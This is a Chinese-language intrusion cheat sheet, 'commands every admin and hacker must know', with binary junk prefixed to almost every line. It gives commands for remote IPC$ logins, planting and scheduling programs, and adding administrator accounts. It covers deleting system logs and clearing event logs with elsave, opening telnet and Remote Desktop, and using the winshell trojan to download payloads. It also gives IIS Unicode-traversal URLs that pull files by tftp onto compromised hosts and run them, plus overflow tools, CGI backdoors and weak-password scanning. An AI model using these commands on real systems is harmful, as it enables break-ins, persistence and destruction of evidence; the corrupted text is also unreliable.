网管和黑客都必须知道的命令
�FGo{6'K(: 常用的几条NET命令:
g)��c��<\% {h��r>m,O% (与远程主机建立空管连接) net use \\IP地址\ipc$ "" /use:""
�_�]E �H~; fA{[H:*}G� (以管理员身份登录远程主机) net use \\IP地址\ipc$ "密码" /use:"Administrator"
B~K@�o.�%� d�Y'/\d�J� (传送文件到远程主机WINNT目录下)copy 本机目录路径\程序 \\IP地址\admin$
��x�PoI+, �^i��AOz-H (查看远程主机时间) net time \\IP地址
~UA:_7#�\M }wJ-*�By{+ (定时启动某个程序) at \\IP地址 02:18 readme.exe
�'o;�>6u<u 4j�MC�E&<� (查看共享) net view \\IP地址
@}k5rcQ*�/ [+�<lm�
5t (查看netbios工作组列表) nbtstat -A IP地址
f mu� `o-� ��FMMQO,BU (将远程主机C盘映射为自己的F盘) net use f: \\IP地址\c$ ""/user:"Administrator"
�.G8+D%%�. �T<1*�R>el (这两条把自己增加到管理员组): net user 用户名 密码 /add
{,61V;Bpm [9dW9[�Z+! net localgroup Administrators 用户名 /add
is���@8x!c h8�OmO�5/H (断开连接) net use \\IP地址\ipc$ /delete
qP=4D
9 �] w�9h`8��pt 扫尾:
L6S!?t.{Yv s�|�L�}wtc del C:\winnt\system32\logfiles\*.*
_P9T�h#UAg �I*8i=O@0T del C:\winnt\ssytem32\config\*.evt
�3~�v'��Ev '}3@D$YiM% del C:\winnt\system32\dtclog\*.*
's#"~�<L^e y�^�p�z�qv del C:\winnt\system32\*.log
7@iy�O7�U �`(NMHXgG+ del C:\winnt\system32\*.txt
Kg��h@.Ir� =w��&JD�j� del C:\winnt\*.txt
J;"66�ue(d �vZ3/t8$*� del C:\winnt\*.log
y�U'��Fyul >W��v�b!8N 一、netsvc.exe
���9�1B�l{ $K�D��H"J� 下面的命令分别是列出主机上的服务项目、查寻和远程启动主机的“时间任务”服务:
e
lj�]��e hn]><�k�aA netsvc /list \\IP地址
�>~C*m �`# �)r��X�["= netsvc schedule \\IP地址 /query
���6�bj.z Fv�_�rD�To netsvc \\IP地址 schedule /start
*���Xm�$�w kex4U6&OQB 二、OpenTelnet.exe
:rr;�9nMR[ )"�S�P >2} 远程启动主机的Telnet服务,并绑定端口到7878,例如:
_4H
9rP�hf ��5>{��� OpenTelnet \\IP地址 用户名 密码 1 7878
cZ>h��[XX[ �,��.X�qb~ 然后就可以telnet到主机的7878端口,进入DOS方式下:
kayb�i �0 |oCE�7'BaP telnet IP地址 7878
-U��D^O*�U 1Q-O&\�-xg 三、winshell.exe
=P>c�1T1- ~@g7b`t=la 一个非常小的木马(不到6K),telnet到主机的7878端口,输入密码winshell,当看到CMD>后,可打下面的命令:
gG5�@ KD6k ~:8}B�z2!5 p Path (查看winshell主程序的路径信息)
,|RS]�I>X� )��y8 u+5^ b reBoot (重新启动机器)
?8��dd^iX/ ;.Dm?��J�0 d shutDown (关闭机器)
�o�\���ss� �|j3fS�[.$ s Shell (执行后你就会看到可爱的“C:\>”)
d�k}T&qZ~p gzdR|�I�Ba x eXit (退出本次登录会话,此命令并不终止winshell的运行)
H�H�d;<%�q �Hqs�j5j2i CMD>
http://.../srv.exe (通过http下载其他网站上的文件到运行winshell的机器上)
<��<a�1a�� rmV�F�88/; 四、3389登陆器,GUI方式登录远程主机的
liu%K9��-r !=sM �`(=~ 五、elsave.exe
6�KT]3*B � �}��@VdtH 事件日志清除工具
+\r�=/""DW 0A��$x'pU) elsave -s \\IP地址 -l "application" -C
k.UQ��T�^. �+�+�b1VBP elsave -s \\IP地址 -l "system" -C
+-8S,Rg@ � b=Rw=�K.�
elsave -s \\IP地址 -l "security" -C
!{h�C99q6� |/Q7 �o�1i 执行后成功清除应用程序日志,系统日志,安全日志
%OS}BAh^i� T�4H/D^�X| 六、hbulot.exe
7�-�p9IFcA HP`dfo�~j 开启win2kserver和winxp的3389服务
qHM���,#W< �d"h*y��H@ hbulot [/r]
CJ�'pZ�]\G �i6)7)^n�G 使用/r表示安装完成后自动重起目标使设置生效。
�.&�|Ivz6 {[Bo��"a>% 七、nc.exe(netcat.exe)
jS_�fwuM�� *Cs��R�O�� 一个很好的工具,一些脚本程序都要用到它,也可做溢出后的连接用。
8��Jnl!4�� �/3(� a'o[ 想要连接到某处: nc [-options] hostname port[s] [ports] ...
�cu�)s��sT u�;�-_�%�? 绑定端口等待连接: nc -l -p port [-options] [hostname] [port]
0�f"9w��PC 99xs�5!4�s 参数:
&�35�6�
� ���SE�f:�u -e prog 程序重定向,一旦连接,就执行 [危险!!]
)83UF
r4kP <m") 2d�J -g gateway source-routing hop point[s], up to 8
?\�_\p�a/+ H)�;O.�m� -G num source-routing pointer: 4, 8, 12, ...
EMe3Xb�
` ��.�\/jy]Y -h 帮助信息
s"t�yCDc.c ����12�W`7 -i secs 延时的间隔
W Z!?O�0.A ��.O��h4b5 -l 监听模式,用于入站连接
E�tv!:\�\[ /&PRw<}>_o -n 指定数字的IP地址,不能用hostname
EL--?�<g� CJ�n{�tP�� -o file 记录16进制的传输
M|HW$8V3_2 (4;�m*'�X -p port 本地端口号
C�2�$_Ad=s y,D@�[*~Xb -r 任意指定本地及远程端口
��+0{$J\�s ]VuB2L[�D� -s addr 本地源地址
O/Q�7{�5n !&�8nwOG�� -u UDP模式
Q~p)��@[q� 7��FQ&LF46 -v 详细输出——用两个-v可得到更详细的内容
G�[;G�P0\N x�%�J4A+kU -w secs timeout的时间
U04TVQ�n`� ���j<B�W/� -z 将输入输出关掉——用于扫描时
�U-����b�( 八、TFTPD32.EXE
�)���sONfn uItzFX*��� 把自己的电脑临时变为一台FTP服务器,让肉鸡来下载文件,tftp命令要在肉鸡上执行,通常要利用Unicode漏洞或telnet到肉鸡,例如:
G=1&:nW��'
�>M2�~BDZ http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c tftp -i 本机IP地址 get 文件名 c:\winnt\system32\文件名
�7yUtG^�'b U,;a+z�4�\ 然后可以直接令文件运行:
8ClOd��<I 1=*QMEv1G
http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c+文件名
�]�2�Vu+AP %A]?5J�)Bi 九、prihack.exe是IIS的printer远程缓冲区溢出工具。idqover.exe是溢出idq的,选择“溢出后在一个端口监听”,然后用telnet连接它的监听端口,如果溢出成功,一连它的端口,绑定的命令马上执行。xploit.exe是一个图形界面的ida溢出,成功以后winxp下需要打winxp。
E.ugr��])� b�S�G��}I| 一○、ntis.exe、cmd.exe和cmdasp.asp是三个cgi-backdoor,exe要放到cgi-bin目录下,asp放到有ASP执行权限的目录。然后用IE浏览器连接。
//x^[fkNq) eUY/�H�1�� 一、一 Xscan命令行运行参数说明:
{ :^�;byd ~2HlAU))<& 在检测过程中,按"[空格]"键可以查看各线程状态及扫描进度,按"q"键保存当前数据后提前退出程序,按"<ctrl+c>"强行关闭程序。
R�]LRgfi9 5o�v F$qn� 1.命令格式: xscan -host <起始IP>[-<终止IP>] <检测项目> [其他选项]
�D7X8yv��1 N9��SC��\ xscan -file <主机列表文件名> <检测项目> [其他选项]
L6>;"]:�f` =h�w&��2c� 其中<检测项目> 含义如下:
#![�9QUvcf *�VP-�fyJp -port : 检测常用服务的端口状态(可通过\dat\config.ini文件的"PORT-SCAN-OPTIONS\PORT-LIST"项定制待检测端口列表);
sf7~��hN*
�Fj_6jsDb -ftp : 检测FTP弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);
[WfigqY`b* K@RE-��K6{ -ntpass : 检测NT-Server弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);
B4l��*�]K% 26e�.��Hu -cgi : 检测CGI漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
J*!_kg)>�J 7I#<w[l>k� -iis : 检测IIS漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
aa-{,X"MF �MAv-`�8@| [其他选项] 含义如下:
>e'Hz�(~'/ )o=ip��m[� -v: 显示详细扫描进度
E]aQK.���
v��zXfJP� -p: 跳过Ping不通的主机
t)p��. ��$ I`%� ]1��{ -o: 跳过没有检测到开放端口的主机
UPE9e
��� ��k�=^~\$e -t <并发线程数量[,并发主机数量]>: 指定最大并发线程数量和并发主机数量, 默认数量为100,10
